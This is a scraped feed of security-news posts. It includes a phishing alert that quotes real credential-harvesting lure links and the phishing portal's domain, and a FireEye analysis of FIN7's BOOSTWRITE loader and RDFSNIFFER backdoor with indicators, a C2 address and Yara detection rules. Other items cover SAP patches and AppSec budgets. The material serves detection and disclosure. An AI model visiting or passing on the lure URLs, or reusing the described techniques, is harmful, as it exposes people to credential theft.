Vis Dokument (https://amagauto-my.sharepoint.com/personal/senad_ljubuncic_amag_ch/_layouts/15/WopiFrame.aspx?sourcedoc={7ea83df5-6fc6-4c9c-9b65-fb8806b565be}&action=view&wd=target%28Document.one%7C97f58f57-7285-4f70-8af0-fb5d7d3e3b82%2FPDF%20002%7C4c8df191-241d-4d43-91b6-b3658f3bcdca%2F%29)

Med vennlig hilsen


[Phone, Email, Company name etc.]

Translated into English, this email would be this:

From: [sender email address]
Sent: October 2, 2019 9:56 AM
Subject: Doc
Priority: High


Find the attached document

View Document (https://amagauto-my.sharepoint.com/personal/senad_ljubuncic_amag_ch/_layouts/15/WopiFrame.aspx?sourcedoc={7ea83df5-6fc6-4c9c-9b65-fb8806b565be}&action=view&wd=target%28Document.one%7C97f58f57-7285-4f70-8af0-fb5d7d3e3b82%2FPDF%20002%7C4c8df191-241d-4d43-91b6-b3658f3bcdca%2F%29)

With best regards


[Phone, Email, Company name etc.]

What happens next if the user clicks that link?

They are redirected to a picture of a document (it’s not even a real document). The picture has a hyperlink inserted on it, so when the user clicks it they are redirected to a malicious page.

[Screenshot of the fake document]

The fraudulent page then asks users to log in with whatever account they have: Yahoo, Office 365, Gmail, etc.

A day later, the Nordics credential stealing campaign took a new form. This time, the malicious document link was this one instead: https://farmtools-my.sharepoint.com/personal/johanna_ratia_farmtools_fi/_layouts/15/WopiFrame.aspx?sourcedoc={b70a453e-0c44-45f5-8a31-01d022e88a43}&action=view&wd=target%28Document%20Library.one%7C53cc22f2-1e03-4b9b-8bc5-9b8bc9980cb7%2FScan0000495%7C5773954c-e41f-4956-859b-56edd77199ed%2F%29

In both cases the lure was hosted on a legitimate OneDrive for Business tenant (note the *-my.sharepoint.com hosts and the /personal/ paths belonging to other organisations’ users), which is why domain reputation alone does not flag these links, and the malicious portal behind the fake links was https://lazzysisland.com.
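The two lure links above share one structure: a OneDrive for Business “WopiFrame” viewer on some other organisation’s tenant, opening a OneNote section (.one) whose name is passed in the wd=target(...) parameter. The following Python is an added example, not code from Heimdal or from the post, that pulls those pieces out of the URLs so a mail filter can hold the message on the lure’s structure rather than on host reputation. The two URLs are the ones quoted in the post; the trusted-tenant set and the indicator wording are assumptions for the organisation running the check.

```python
"""Added example (not Heimdal's code): dissect OneDrive-for-Business
WopiFrame lure links like the two in the post and return the reasons a
mail filter would hold the message."""
import re
from urllib.parse import urlsplit, parse_qs

# The two links from the campaign, copied from the post.
LURE_URLS = [
    "https://amagauto-my.sharepoint.com/personal/senad_ljubuncic_amag_ch/_layouts/15/WopiFrame.aspx"
    "?sourcedoc={7ea83df5-6fc6-4c9c-9b65-fb8806b565be}&action=view"
    "&wd=target%28Document.one%7C97f58f57-7285-4f70-8af0-fb5d7d3e3b82%2FPDF%20002%7C4c8df191-241d-4d43-91b6-b3658f3bcdca%2F%29",
    "https://farmtools-my.sharepoint.com/personal/johanna_ratia_farmtools_fi/_layouts/15/WopiFrame.aspx"
    "?sourcedoc={b70a453e-0c44-45f5-8a31-01d022e88a43}&action=view"
    "&wd=target%28Document%20Library.one%7C53cc22f2-1e03-4b9b-8bc5-9b8bc9980cb7%2FScan0000495%7C5773954c-e41f-4956-859b-56edd77199ed%2F%29",
]


def parse_wopi_link(url):
    """Return tenant, personal-site owner, sourcedoc id and the names inside wd=target(...)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    # <tenant>-my.sharepoint.com is the OneDrive for Business host pattern
    tenant = host[:-len("-my.sharepoint.com")] if host.endswith("-my.sharepoint.com") else None
    segs = parts.path.split("/")
    owner = segs[2] if len(segs) > 2 and segs[1] == "personal" else None
    query = parse_qs(parts.query)            # parse_qs already percent-decodes the values
    wd = query.get("wd", [""])[0]
    m = re.fullmatch(r"target\((.*)\)", wd)
    # each "<name>|<guid>" segment of the target path; the first one is the hosted file
    target = [seg.split("|")[0] for seg in m.group(1).split("/") if seg] if m else []
    return {"tenant": tenant, "owner": owner,
            "sourcedoc": query.get("sourcedoc", [None])[0], "target": target}


def lure_indicators(url, trusted_tenants):
    """Reasons to hold a message carrying this link; an empty list means nothing odd was seen."""
    info = parse_wopi_link(url)
    reasons = []
    if info["tenant"] is None:
        return reasons                       # not a OneDrive for Business link at all
    if info["tenant"] not in trusted_tenants:
        reasons.append("document shared from another organisation's tenant: %s" % info["tenant"])
    if info["target"] and info["target"][0].lower().endswith(".one"):
        reasons.append("'document' is a OneNote section (%s), not the PDF the mail implies" % info["target"][0])
    return reasons


if __name__ == "__main__":
    for u in LURE_URLS:
        print(parse_wopi_link(u))
        print(lure_indicators(u, trusted_tenants={"example"}))   # "example" is a hypothetical own tenant
```

The `.one` check is the useful one: a OneNote section file opened in the browser renders whatever image the sender pasted in, which is exactly the “picture of a document” with a hyperlink on it described above.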

How to Stay Safe from the New Nordics Credential Stealing Campaign

If you have an active Thor Foresight or Thor Premium subscription you are automatically protected from the malicious links above.

But if you’re not – and even if you are – make sure you’re ready for the next round. This campaign or another one like it will be back.

The best way to deal with them is to stay on your guard:

  • Don’t open documents and don’t click any links in emails from people you don’t know;
  • Be proactive about your cybersecurity and have a DNS traffic filter (like Thor Foresight – either for Home or Enterprise);
  • Stay informed about credential stuffing (why criminals might want to steal your credentials) and about phishing in general;
  • If you are part of managing an organization (which means you and your employees will be huge targets for all sorts of phishing attempts), learn about business email compromise (BEC) and about MailSentry™, a cybersecurity solution specially designed to block BEC attacks of any kind.

Stay safe!

The post SECURITY ALERT: New Credential Stealing Campaign Hits Nordic Countries appeared first on Heimdal Security Blog.

Making the Case for AppSec? Break Down Your Budget

The bottom line on corporate decision-making comes down to the bottom line. It’s critical to demonstrate value for any new or expanded initiative. Fall short, and your odds of success are greatly diminished.

How do you build the financial case for more robust AppSec, when the focus is on the impact to the bottom line? The key is understanding how to effectively design and present a budget that makes sense to your stakeholders. A crucial element is to recognize that stakeholders need options and choices. By breaking down your budget into categories such as “must do,” “should do,” and “could do,” you’ll greatly increase the odds of securing the budget you need. It’s a lot harder to say no to several different options than to one plan and one number.

Breaking It Down

You most likely have a range of priorities within your AppSec initiative that you’d like funding for – the must do, should do, and could do activities you and your team want to execute. If you break down your “ask” into these three categories, you give your stakeholders options regarding what they can approve. For example, you might offer the following budget options:

Must: We must comply with industry regulations regarding AppSec. Whether it’s PCI, HIPAA, or NY DFS cybersecurity regulations, non-compliance is not an option, and getting budget to address regulations shouldn’t take much convincing.

Should: We should assess code with static analysis, eliminate all “high” or “very high” severity flaws, and train developers on secure coding. Getting at the most-likely-to-be-exploited vulnerabilities and cutting down on the new vulnerabilities being introduced into your code is a good place to start.

Could: We could employ multiple testing techniques beyond static analysis and eliminate the “medium” severity flaws as well. Ultimately, static analysis is a good starting point, but truly effective AppSec requires several testing types that find different vulnerabilities in different ways, including dynamic analysis, software composition analysis, and manual penetration testing.

The right frameworks can help guide you through this budget breakdown. For instance, the Veracode Verified program provides a best-practice AppSec roadmap you can use to show a clear path forward. It can also help you break down the must/should/could items. The ability to show progress and defend your budget is essential to getting the backing you need from key executives. You also don’t want to stall at the “must” budget, but show a path toward the most effective and efficient AppSec program.

Additional Budget Selling Points

After breaking down your budget to give stakeholders options, you can create urgency around the spend by finding an event or series of events that demonstrate the seriousness of the issue. This includes data about code vulnerabilities, incidents, and breaches, and what direct and indirect costs grow out of these events. For example, the UK Information Commissioner’s Office recently announced its intention to fine British Airways £183 million over its 2018 data breach.

In addition, highlight efficiencies gained by your program. For example, demonstrate how an integrated and automated program will free staff from cumbersome and time-consuming processes, or how teams will be able to better focus on innovation.

Finally, a good foundation for any business case is industry stats or benchmarks. Consider adding these data points into your pitch. You can find some in our State of Software Security report or consider the OpenSAMM model.

On the Money

Ultimately, any presentation should deliver only the most relevant points in a digestible format. Busy executives want to know whether a project will have a positive impact and what that positive impact will be. In order to become an effective change agent, keep your proposal and budget request limited to a half a dozen key points, and be sure to focus on the issues that matter to specific executives.

Remember, a robust AppSec program is a multi-year endeavor, and keeping the funding stream flowing is critical. In order to do this, budget requests must be tied to metrics, KPIs, and other measures. You must demonstrate ongoing success and show results in real-world ways that truly matter to business leaders and your enterprise. With buy-in from key stakeholders, your odds of obtaining essential funding and support are high. And that, in the end, is a formula for a more secure enterprise.

For more details on making the case for AppSec budget, see our new guide, Building a Business Case for Expanding Your AppSec Program.

SAP October 2019 Security Patch Day fixes 2 critical flaws

SAP addressed two critical vulnerabilities (Hot News) as part of the October 2019 Security Patch Day.

SAP has released its October 2019 Security Patch Day updates that also address two critical vulnerabilities (Hot News) with CVSS scores of 9.3 and 9.1.

The October 2019 Security Patch Day also includes a High Priority Note addressing a Binary Planting vulnerability.

“With only nine new and one updated Security Note, SAP has published an unusually low number of Security Notes for October 2019.” reads the analysis published by security firm Onapsis. “This is the lowest number of newly published notes in the past five years. Nevertheless, with 2 HotNews Notes and one High Priority Note, this Patch Day deserves special attention as an attacker needs only one vulnerability for a successful attack.”

The most severe SAP Security Note is #2826015, which addresses a Missing Authentication Check in the AS2 Adapter of the B2B Add-On for SAP NetWeaver Process Integration. The vulnerability, tracked as CVE-2019-0379, could be exploited by remote attackers to steal or manipulate sensitive data, and could also give them access to administrative and other privileged functionality.

“The adapter specifies a comprehensive set of data security features, specifically data confidentiality and data authenticity, which are aimed at the B2B commerce environment. The configuration of the AS2 adapter allows two different security providers.” reads the analysis published by Onapsis. “Depending on the selected provider, a Missing Authentication vulnerability exists that can lead to sensitive data theft or data manipulation as well as to access to administrative and other privileged functionalities.”

The vulnerability received a CVSS score of 9.3.

The second Hot News note (SAP Security Note #2828682) addresses CVE-2019-0380, an information disclosure flaw in SAP Landscape Management enterprise edition. The flaw affects version 3.0 and received a CVSS score of 9.1. It is related to the custom parameters that users can add to providers assigned to custom operations.

“SAP Security Note #2828682 talks about a risk of information disclosure if these custom parameters fulfill specific conditions. SAP describes the overall conditions for the existence of the vulnerability as ‘uncommon’.”

SAP also addressed a Binary Planting vulnerability in several SAP software products, including SQL Anywhere, SAP IQ and SAP Dynamic Tiering. The flaw, tracked as CVE-2019-0381, resides in the file search algorithm of the affected products and received a CVSS score of 7.8.

“The algorithm searches too many directories, even if they are out of the application scope.” Onapsis explains. “Possible impacts are path traversals and directory climbing, enabling an attacker to read, overwrite, delete, and expose arbitrary files of the system. This can also lead to DLL hijacking as well as to privilege elevation.”

SAP also addressed multiple Cross-Site Scripting (XSS) vulnerabilities in its products, rated as medium, including one in Customer Relationship Management (CVE-2019-0368) and several in the SAP BusinessObjects Business Intelligence Platform (CVE-2019-0374, CVE-2019-0375, CVE-2019-0376, CVE-2019-0377, and CVE-2019-0378).

The full list of the addressed issues in SAP Security Patch Day – October 2019 is available here.

Pierluigi Paganini

(SecurityAffairs – SAP, hacking)

The post SAP October 2019 Security Patch Day fixes 2 critical flaws appeared first on Security Affairs.

Microsoft NTLM vulnerabilities could lead to full domain compromise

Preempt researchers have discovered two vulnerabilities that may allow attackers to bypass a number of protections and mitigations against NTLM relay attacks and, in some cases, to achieve full domain compromise of a network. What is NTLM? NT LAN Manager (NTLM) is an authentication protocol developed by Microsoft, used to authenticate a client to resources on an Active Directory domain. “Interactive NTLM authentication over a network typically involves two systems: a client system, where the … More

The post Microsoft NTLM vulnerabilities could lead to full domain compromise appeared first on Help Net Security.

Mahalo FIN7: Responding to the Criminal Operators’ New Tools and Techniques

During several recent incident response engagements, FireEye Mandiant investigators uncovered new tools in FIN7’s malware arsenal and kept pace as the global criminal operators attempted new evasion techniques. In this blog, we reveal two of FIN7’s new tools that we have called BOOSTWRITE and RDFSNIFFER.

The first of FIN7's new tools is BOOSTWRITE – an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. One of the analyzed BOOSTWRITE variants contained two payloads: CARBANAK and RDFSNIFFER. While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators.

RDFSNIFFER, a payload of BOOSTWRITE, appears to have been developed to tamper with NCR Corporation's “Aloha Command Center” client. NCR Aloha Command Center is a remote administration toolset designed to manage and troubleshoot systems within payment card processing sectors running the Command Center Agent. The malware loads into the same process as the Command Center process by abusing the DLL load order of the legitimate Aloha utility. Mandiant provided this information to NCR.

BOOSTWRITE Loader: Where You At?

BOOSTWRITE is a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.

Once loaded, `DWrite.dll` connects to a hard-coded IP and port from which it retrieves a decryption key and initialization vector (IV) to decrypt two embedded payload DLLs. To accomplish this task, the malware first generates a random file name to be used as a text log under the current user's %TEMP% directory; this filename starts with ~rdf and is followed by a set of random numbers. Next, the malware scans its own image to find the location of a 32-byte long multi-XOR key which is used to decode data inside its body. Part of the decoded data is an IP address and port which are used to retrieve the key and the IV for the decryption of the embedded payloads. The encryption algorithm uses the ChaCha stream cipher with a 256-bit key and 64-bit IV.

Once the key and the IV are downloaded the malware decrypts the embedded payloads and performs sanity checks on the results. The payloads are expected to be PE32.DLLs which, if the tests pass, are loaded into memory without touching the filesystem.

The malware logs various plaintext messages to the previously created logfile %TEMP%\~rds<rnd_numbers> which are indicative of the loader’s execution progress. An example of the file content is shown in Figure 1:

Init OK
Key OK
Data: 4606941
HS: 20
K:[32] V:[8]
DCnt: 732642317(ERR)

Figure 1: BOOSTWRITE log file

Before exiting, the malware resolves the location of the benign DWrite.dll library and passes the execution control to its DWriteCreateFactory method.

The malware decrypts and loads two payload DLLs. One of the DLLs is an instance of the CARBANAK backdoor; the other DLL is a tool tracked by FireEye as RDFSNIFFER which allows an attacker to hijack instances of the NCR Aloha Command Center Client application and interact with victim systems via existing legitimate 2FA sessions.

RDFSNIFFER Module: We Smell a RAT

RDFSNIFFER is a module loaded by BOOSTWRITE which allows an attacker to monitor and tamper with legitimate connections made via NCR Corporation’s ‘Aloha Command Center Client’ (RDFClient), an application designed to provide visibility and system management capabilities to remote IT techs. RDFSNIFFER loads into the same process as the legitimate RDFClient by abusing the utility’s DLL load order, launching each time the ‘Aloha Command Center Client’ is executed on an impacted system.

When the RDFSNIFFER module is loaded by BOOSTWRITE it hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user-interface (Table 1). Furthermore, this enables the malware to alter the user’s last input time to ensure application sessions do not time out.

Win32 API Function / Hook Description
(The individual function names are not preserved in this copy; the ten hooks break down as follows.)

  2 hooks – used to man-in-the-middle SSL sessions
  3 hooks – used to man-in-the-middle socket connections
  4 hooks – used to hijack the utility's UI
  1 hook  – used to change the user's last input time (to avoid timed lock outs)

Table 1: RDFSNIFFER’s Hooked Win32 API Functions

This module also contains a backdoor component that enables it to inject commands into an active RDFClient session. This backdoor allows an attacker to upload, download, execute and/or delete arbitrary files (Table 2).

Command Name / Legit Function in RDFClient / RDFClient Command ID / Description
(The command names, legitimate RDFClient functions and command IDs are not preserved in this copy; the five backdoor functions are:)

  • Uploads a file to the remote system
  • Retrieves a file from the remote system
  • Executes a command on the remote system
  • Deletes a file on the remote system
  • Deletes a local file

Table 2: RDFSNIFFER’s Backdoor Functions

Signed: Yours Truly, FIN7

While the majority of BOOSTWRITE variants recovered from investigations have been unsigned, Mandiant identified a signed BOOSTWRITE sample used by FIN7 during a recent investigation. Following that discovery, a signed BOOSTWRITE sample was uploaded to VirusTotal on October 3. This executable uses a code signing certificate issued to MANGO ENTERPRISE LIMITED (Table 3).

Certificate subject:  MANGO ENTERPRISE LIMITED
Thumbprint:           32 7F 8F 10 74 78 42 4A BE B8 2A 85 DC 36 57 03 CC 82 70 5B

Table 3: Code signing certificate used for BOOSTWRITE

This indicates the operators may be actively altering this malware to avoid traditional detection mechanisms. Notably, the signed BOOSTWRITE sample had a 0/68 detection ratio when it was uploaded to VirusTotal, demonstrating the effectiveness of this tactic (Figure 2).

Figure 2: Current VirusTotal detection ratio for signed BOOSTWRITE

Use of a code signing certificate for BOOSTWRITE is not a completely new technique for FIN7, as the group has used digital certificates in the past to sign their phishing documents, backdoors, and later-stage tools. By exploiting the trust inherently provided by code certificates, FIN7 increases their chances of bypassing various security controls and successfully compromising victims. The full evasion achieved against the detection engines deployed to VirusTotal – as compared to an unsigned BOOSTWRITE sample with an invalid checksum – illustrates that FIN7’s methods were effective in subverting both traditional detection and ML binary classification engines. This is a known issue and has been deeply studied since at least 2016’s “Chains of Distrust” research and 2017’s “Certified Malware” paper. Since there are plenty of goodware samples with bad or no signatures – and a growing number of malware samples with good signatures – there is no easy solution here. The upside is that vendors selectively deploy engines to VirusTotal (including FireEye), and VT detection performance often isn’t a comprehensive representation of encountering full security technology stacks that implement detection-in-depth. Later in this blog we further explore BOOSTWRITE’s PE Authenticode signature, its anomalies, and how code signing can be turned from a detection challenge into detection opportunities.

Outlook and Implications

While these incidents have also included FIN7’s typical and long-used toolsets, such as CARBANAK and BABYMETAL, the introduction of new tools and techniques provides further evidence FIN7 is continuing to evolve in response to security enhancements. Further, the use of code signing in at least one case highlights the group's judicious use of resources, potentially limiting their use of these certificates to cases where they have been attempting to bypass particular security controls. Barring any further law enforcement actions, we expect at least a portion of the actors who comprise the FIN7 criminal organization to continue conducting campaigns. As a result, organizations need to remain vigilant and continue to monitor for changes in methods employed by the FIN7 actors.

Sigs Up Dudes! Indicators, Toolmarks, and Detection Opportunities

While FireEye does not release our production detection logic for the code families, this section does contain some identification and hunting concepts that we adopt in our layered detection strategy. Table 4 contains malware samples referenced in this blog that FireEye is able to share from the larger set recovered during active investigations.

BOOSTWRITE (signed)

MD5:     a67d6e87283c34459b4660f19747a306
SHA-1:   a873f3417d54220e978d0ca9ceb63cf13ec71f84
SHA-256: 18cc54e2fbdad5a317b6aeb2e7db3973cc5ffb01bbf810869d79e9cb3bf02bd5

C2: 109.230.199[.]227

BOOSTWRITE (unsigned)

MD5:     af2f4142463f42548b8650a3adf5ceb2
SHA-1:   09f3c9ae382fbd29fb47ecdfeb3bb149d7e961a1
SHA-256: 8773aeb53d9034dc8de339651e61d8d6ae0a895c4c89b670d501db8dc60cd2d0

C2: 109.230.199[.]227

Table 4: Publicly-shareable BOOSTWRITE samples

The signed BOOSTWRITE sample has a PE Authenticode anomaly that can be detected using Yara’s pe module. Specifically, the PE linker timestamp is prior to the Authenticode validity period, as seen in Table 5.

2019-05-20 09:50:55 UTC                       Signed BOOSTWRITE’s PE compilation time
2019-05-22 00:00 UTC to 2020-05-21 23:59 UTC   Signed BOOSTWRITE’s “MANGO ENTERPRISE LIMITED” certificate validity window

Table 5: Relevant executable timestamps

A public example of a Yara rule covering this particular PE Authenticode timestamp anomaly is available in a blog post from David Cannings, with the key logic shown in Figure 3.

pe.number_of_signatures > 0 and not for all i in (0..pe.number_of_signatures - 1):

Figure 3: Excerpt of NCC Group’s research Yara rule

There are other PE Authenticode anomalies that can also be represented as Yara rules to surface similarly suspicious files. Of note, this signed BOOSTWRITE sample has no counter signature and, while the unauthenticated attributes timestamp structure is present, it is empty. In preparing this blog, FireEye’s Advanced Practices team identified a possible issue with VirusTotal’s parsing of signed executable timestamps as seen in Figure 4.

Figure 4: Inconsistency in VirusTotal file signature timestamps for the signed BOOSTWRITE sample

FireEye filed a bug report with Google to address the discrepancy in VirusTotal in order to remove confusion for other users.

To account for the detection weaknesses introduced by techniques like code signing, our Advanced Practices team combines the malicious confidence spectrum that comes from ML detection systems with file oddities and anomalies (weak signals) to surface highly interesting and evasive malware. This technique was recently described in our own Dr. Steven Miller’s Definitive Dossier of Devilish Debug Details. In fact, the exact same program database (PDB) path-based approach from his blog can be applied to the toolmarks seen in this sample for a quick hunting rule. Figure 5 provides the PDB path of the BOOSTWRITE samples from this blog.


Figure 5: BOOSTWRITE PDB path

The Yara rule template can be applied to result in the quick rule in Figure 6.

rule ConventionEngine_BOOSTWRITE {
    meta:
        author = "Nick Carr (@itsreallynick)"
        reference = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"
    strings: $weetPDB = /RSDS[\x00-\xFF]{20}[a-zA-Z]?:?\\[\\\s|*\s]?.{0,250}\\DWriteImpl[\\\s|*\s]?.{0,250}\.pdb\x00/ nocase
    condition: (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $weetPDB and filesize < 6MB
}

Figure 6: Applying BOOSTWRITE’s PDB path to a Yara rule

We can apply this same concept across other executable traits, such as BOOSTWRITE’s export DLL name (DWriteImpl.dll), to create quick and easy rules that can aid in quick discovery as seen in Figure 7.

import "pe"
rule Exports_BOOSTWRITE {
    meta: author = "Steve Miller (@stvemillertime) & Nick Carr (@itsreallynick)"
    strings: $exyPants = "DWriteImpl.dll" nocase
    condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $exyPants at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12)) and filesize < 6MB
}

Figure 7: Applying BOOSTWRITE’s export DLL names to a Yara rule (Note: this rule was updated following publication. It previously read "module_ls.dll", which is for Turla and unrelated.)
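The three rules above each key on one PE structure: the COFF link timestamp (Table 5), the RSDS CodeView record that carries the PDB path (Figure 6), and the export directory’s name pointer twelve bytes in (Figure 7). The Python below is an added example, not FireEye’s code, that builds a small constructed PE32 image carrying all three toolmarks and then checks each of them the way the Yara pe module does, so you can see what the rules are actually comparing. The file layout, RVAs, export name placement and the PDB path are hypothetical demo values; only the timestamps are taken from Table 5. The certificate validity window is supplied as input rather than parsed out of the Authenticode blob, since decoding the PKCS#7 structure is outside this example’s scope.

```python
"""Added example (not FireEye's code): a constructed PE32 with BOOSTWRITE-style
toolmarks plus checks mirroring the Yara logic in Figures 3, 6 and 7."""
import re
import struct
from datetime import datetime, timezone

COMPILE_TS = datetime(2019, 5, 20, 9, 50, 55, tzinfo=timezone.utc)   # Table 5
CERT_NOT_BEFORE = datetime(2019, 5, 22, 0, 0, tzinfo=timezone.utc)    # Table 5
CERT_NOT_AFTER = datetime(2020, 5, 21, 23, 59, tzinfo=timezone.utc)   # Table 5

# The $weetPDB pattern from the ConventionEngine rule, as a Python bytes regex.
PDB_RE = re.compile(rb"RSDS[\x00-\xff]{20}[a-zA-Z]?:?\\[\\\s|*\s]?.{0,250}"
                    rb"\\DWriteImpl[\\\s|*\s]?.{0,250}\.pdb\x00", re.IGNORECASE | re.DOTALL)

SECT_RVA, SECT_RAW = 0x1000, 0x200   # one section: RVA 0x1000 is backed by file offset 0x200


def build_sample_pe(link_time, export_name=b"DWriteImpl.dll",
                    pdb_path=b"C:\\build\\DWriteImpl\\Release\\DWriteImpl.pdb"):
    """Minimal constructed PE32 (hypothetical layout): export dir, debug dir, RSDS record."""
    name_rva, dbg_rva, cv_rva = SECT_RVA + 40, SECT_RVA + 0x40, SECT_RVA + 0x60
    codeview = b"RSDS" + b"\x11" * 16 + struct.pack("<I", 1) + pdb_path + b"\x00"  # sig|guid|age|path
    sect = bytearray(0x200)
    sect[0:40] = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, name_rva, 1, 0, 0, 0, 0, 0)   # IMAGE_EXPORT_DIRECTORY
    sect[40:41 + len(export_name)] = export_name + b"\x00"
    sect[0x40:0x40 + 28] = struct.pack("<IIHHIIII", 0, 0, 0, 0, 2, len(codeview),     # type 2 = CODEVIEW
                                       cv_rva, SECT_RAW + 0x60)
    sect[0x60:0x60 + len(codeview)] = codeview
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    dos[0x3C:0x40] = struct.pack("<I", 0x40)                        # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, int(link_time.timestamp()), 0, 0, 224, 0x2102)
    dirs = [(0, 0)] * 16
    dirs[0], dirs[6] = (SECT_RVA, 40), (dbg_rva, 28)                # EXPORT and DEBUG directories
    opt = struct.pack("<H", 0x10B) + bytes(90) + struct.pack("<I", 16)   # PE32 magic ... NumberOfRvaAndSizes
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    sect_hdr = struct.pack("<8sIIIIIIHHI", b".rdata", 0x200, SECT_RVA, 0x200, SECT_RAW, 0, 0, 0, 0, 0x40000040)
    hdr = bytes(dos) + b"PE\x00\x00" + coff + opt + sect_hdr
    return hdr + bytes(SECT_RAW - len(hdr)) + bytes(sect)


def _u16(b, off):
    return struct.unpack_from("<H", b, off)[0]


def _u32(b, off):
    return struct.unpack_from("<I", b, off)[0]


def is_pe(pe):
    """uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550, as in the rules."""
    return len(pe) > 0x40 and pe[:2] == b"MZ" and pe[_u32(pe, 0x3C):_u32(pe, 0x3C) + 4] == b"PE\x00\x00"


def rva_to_offset(pe, rva):
    """Walk the section table, like yara's pe.rva_to_offset()."""
    pe_off = _u32(pe, 0x3C)
    sect = pe_off + 24 + _u16(pe, pe_off + 20)            # past the COFF and optional headers
    for i in range(_u16(pe, pe_off + 6)):                  # NumberOfSections
        base = sect + i * 40
        va, raw_size, raw = _u32(pe, base + 12), _u32(pe, base + 16), _u32(pe, base + 20)
        if va <= rva < va + raw_size:
            return rva - va + raw
    raise ValueError("RVA %#x is not backed by any section" % rva)


def link_timestamp(pe):
    return datetime.fromtimestamp(_u32(pe, _u32(pe, 0x3C) + 8), tz=timezone.utc)


def export_dll_name(pe):
    """Export directory via data_directories[EXPORT]; the name RVA sits at +12 (the Yara rule's '+12')."""
    pe_off = _u32(pe, 0x3C)
    exp_rva = _u32(pe, pe_off + 24 + 96)                  # PE32: directories start at +96 (PE32+: +112)
    name_off = rva_to_offset(pe, _u32(pe, rva_to_offset(pe, exp_rva) + 12))
    return pe[name_off:pe.index(b"\x00", name_off)].decode()


def pdb_path_matches(pe):
    return PDB_RE.search(pe) is not None


def link_time_outside_cert_validity(pe, not_before, not_after):
    """Table 5's anomaly: a linker timestamp the signing certificate could not have covered."""
    return not (not_before <= link_timestamp(pe) <= not_after)


if __name__ == "__main__":
    sample = build_sample_pe(COMPILE_TS)
    print("PE:", is_pe(sample), "| export:", export_dll_name(sample), "| PDB hit:", pdb_path_matches(sample),
          "| link time outside cert validity:",
          link_time_outside_cert_validity(sample, CERT_NOT_BEFORE, CERT_NOT_AFTER))
```

Linker timestamps are attacker-controlled, so a link time before the certificate’s notBefore is a weak signal on its own; combined with an export name or PDB path hit, as the post does, it is a cheap and specific hunt.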

Of course, resilient prevention capabilities are needed and to that end, FireEye detects this activity across our platforms. Table 6 contains several specific detection names from a larger list of detection capabilities that captured this activity natively.

Platform                               Signature Name
Endpoint Security                      MalwareGuard ML detection (unsigned variants)
Network Security and Email Security    Malware.binary.dll (dynamic detection)
                                       MalwareGuard ML detection (unsigned variants)
                                       APTFIN.Dropper.Win.BOOSTWRITE (network traffic)
                                       APTFIN.Backdoor.Win.RDFSNIFFER (network traffic)
                                       FE_APTFIN_Dropper_Win_BOOSTWRITE (static code family detection)
                                       FE_APTFIN_Backdoor_Win_RDFSNIFFER (static code family detection)

Table 6: FireEye detection matrix

Don’t Sweat the Techniques – MITRE ATT&CK Mappings

BOOSTWRITE

Technique                                  Description
Data Encrypted                             BOOSTWRITE encrypts its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit IV to evade detection
Obfuscated Files or Information            BOOSTWRITE encrypts its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit IV to evade detection
DLL Search Order Hijacking                 BOOSTWRITE exploits the applications’ loading of the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads the local ‘Dwrite’ DLL
Code Signing                               BOOSTWRITE variants were observed signed by a valid CA
Execution through Module Load              BOOSTWRITE exploits the applications’ loading of the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads the local ‘Dwrite’ DLL
Deobfuscate/Decode Files or Information    BOOSTWRITE decrypts its payloads at runtime using a ChaCha stream cipher with a 256-bit key and 64-bit IV

RDFSNIFFER

Technique                                  Description
Execution through API                      RDFSNIFFER hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user interface
File Deletion                              RDFSNIFFER has the capability of deleting local files
(technique name not preserved)             RDFSNIFFER hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user interface


The authors want to thank Steve Elovitz, Jeremy Koppen, and the many Mandiant incident responders that go toe-to-toe with FIN7 regularly, quietly evicting them from victim environments. We appreciate the thorough detection engineering from Ayako Matsuda and the reverse engineering from FLARE’s Dimiter Andonov, Christopher Gardner and Tyler Dean. A special thanks to FLARE’s Troy Ross for the development of his PE Signature analysis service and for answering our follow-up questions. Shout out to Steve Miller for his hot fire research and Yara anomaly work. And lastly, the rest of the Advanced Practices team for both the unparalleled front-line FIN7 technical intelligence expertise and MITRE ATT&CK automated mapping project – with a particular thanks to Regina Elwell and Barry Vengerik.

Canada’s CIO Strategy Council publishes national AI standards

In what it claims is a world first, Canada’s CIO Strategy Council has released a new set of standards to help organizations responsibly deploy emerging technologies with machine learning running under the hood. The not-for-profit organization earned its accreditation to develop National Standards of Canada from the Standards Council of Canada (SCC) earlier this year.…

New Comic Videos Take CISO/Security Vendor Relationship to the Extreme

Today's CISOs operate in an overly intensive environment. As the ones who are tasked with the unenviable accountability for failed protection and successful breaches, they must relentlessly strive to improve their defense lines with workforce education, training their security teams and last but definitely not least — looking for products that will upgrade and adjust their security against

